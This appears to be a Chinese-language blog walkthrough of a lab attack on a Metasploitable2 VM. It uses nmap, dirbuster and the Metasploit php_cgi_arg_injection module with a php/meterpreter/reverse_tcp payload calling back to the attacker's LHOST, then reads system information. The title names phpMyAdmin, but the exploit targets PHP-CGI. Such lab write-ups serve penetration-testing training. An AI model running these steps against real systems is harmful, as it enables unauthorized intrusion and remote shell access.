Msf溢出phpMyAdmin

CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令

环境
kali linux 攻击机:ip 192.168.235.149
metasploitable2 目标机:ip 192.168.235.140

步骤

1、 确保目标机与攻击机能够ping通
在这里插入图片描述
2、 对目标主机进行端口扫描,使用nmap -sV -v 192.168.235.140
在这里插入图片描述
可以看到Apache服务的端口是开着的
3、 浏览器中输入地址192.168.235.140 访问目标主机
在这里插入图片描述
4、 终端中输入dirbuster 启动扫描软件进行扫描
在这里插入图片描述
在Target URL中输入目标主机地址:192.168.235.140 点击“Browse”按钮选择字典文件“/usr/share/dirbuster/wordlists/directory-list-1.0.txt”点击star 开始扫描
在这里插入图片描述
扫描结果显示
在这里插入图片描述
有PHPmyadmin和cgi的目录信息
5、 终端输入msfconsole 打开msf,msf终端中输入search php_cgi 搜索有关CGI php的攻击模块
在这里插入图片描述
6、 终端中输入use exploit/multi/http/php_cgi_arg_injection
Show options
在这里插入图片描述
7、 Show payload可以看到选项里有 payloads相关的攻击载荷模块
在这里插入图片描述
这里我们选择php/meterpreter/reverse_tcp
8、 这里利用meterpreter取得shell连接 set PAYLOAD php/meterpreter/reverse_tcp
在这里插入图片描述
9、 show options 查看有什么参数
在这里插入图片描述
这里我们设置源主机 LHOST 192.168.235.149 设置目标主机 RHOST 192.168.235.140
在这里插入图片描述
输入run开始攻击
在这里插入图片描述
拿到meterpreter
10、 终端中输入 sysinfo
在这里插入图片描述
可以看到相关的信息
看到etc下的配置文件
在这里插入图片描述
可以看到Apache服务器的信息

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值